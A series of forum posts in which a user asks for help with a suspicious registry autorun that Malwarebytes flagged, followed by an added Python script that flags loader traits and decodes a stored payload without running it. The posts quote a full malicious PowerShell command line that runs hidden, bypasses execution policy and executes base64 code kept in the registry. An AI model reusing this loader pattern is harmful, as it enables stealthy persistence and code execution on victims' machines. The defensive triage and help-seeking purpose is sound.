Everything posted by Exouxas

  1. Is there a way to make the script output $GWZNUIECUEHLSMGRMU into a text file instead of executing it? Maybe that would help to see what the script does?
  2. Here we go, got the registry folder for HKCU\Software\Classes\HCOVLIORJR. I checked what programs got started when I run powershell with those arguments manually, and it starts SVCHost each time. Hope someone will be able to find out what this actually is/does. I think this might be residue from a virus that I got from a Thai colleague. It got transmitted through a memory stick by putting all files within a hidden folder and making an "infected" shortcut to the folder. But I'm not sure if it's from that time or if it's something else entirely. reg.zip
  3. Hey, new user on the Malwarebytes forums here. Ok, so I scanned my computer with Malwarebytes, and it detected "PUP.Optional.PowerShellSP". And that's ok, I mean it's just one threat, right? But I started checking the actual registry key, and this MF is actually running powershell, which runs (binary?) code stored in my registry. Does anyone want to check what the code was doing? Here's the registry entry that Malwarebytes detected: "{F119BFAB-D0C9-4E62-9DCF-7923777499B1}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));" I kinda wanted to post this in the "new malware" category, since the registry entry that it executes wasn't detected by Malwarebytes, but it did detect the part where it runs.
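
Added example, not part of the posts above and not Malwarebytes code: a Python triage sketch for the autorun entry quoted in the last post. It flags the loader traits in the command line, extracts the registry key and value name the loader reads, and decodes a stored value to text without running it. `triage`, `decode_payload` and `SAMPLE_B64` are names made up for this example, and the sample payload is constructed because the real value data is not on this page.

```python
import base64
import re

# Run-key data quoted in the post above (.reg escaping, so backslashes are doubled).
RUN_VALUE = (
    r"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile "
    r"-windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII."
    r"GetString([Convert]::FromBase64String((gp "
    r"'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));"
)
# Constructed stand-in for the stored value; the real data is not on this page.
SAMPLE_B64 = base64.b64encode(b"Write-Output 'constructed sample'").decode()

# Traits that together mark a loader running a script kept in the registry.
INDICATORS = {
    "hidden_window": r"-(windowstyle|w)\s+hidden",
    "policy_bypass": r"-(executionpolicy|ep)\s+bypass",
    "invoke_expression": r"\b(iex|invoke-expression)\b",
    "base64_decode": r"frombase64string",
}
# "(gp '<key>').<value name>" names where the encoded script is stored.
PAYLOAD_REF = re.compile(r"\((?:gp|get-itemproperty)\s+'([^']+)'\)\.(\w+)", re.I)


def triage(command):
    """Report matched traits and the registry key/value the loader reads."""
    cmd = command.replace("\\\\", "\\")  # undo .reg escaping
    hits = sorted(n for n, p in INDICATORS.items() if re.search(p, cmd, re.I))
    m = PAYLOAD_REF.search(cmd)
    key, value = (m.group(1), m.group(2)) if m else (None, None)
    return {"indicators": hits, "key": key, "value": value}


def decode_payload(b64_text):
    """Turn the stored base64 into readable text; nothing is executed."""
    raw = base64.b64decode("".join(b64_text.split()), validate=True)
    return raw.decode("ascii", errors="replace")


if __name__ == "__main__":
    print(triage(RUN_VALUE))
    print(decode_payload(SAMPLE_B64))
```

To inspect a real entry, pass `decode_payload` the value data exported from the key that `triage` reports and write the result to a text file for review.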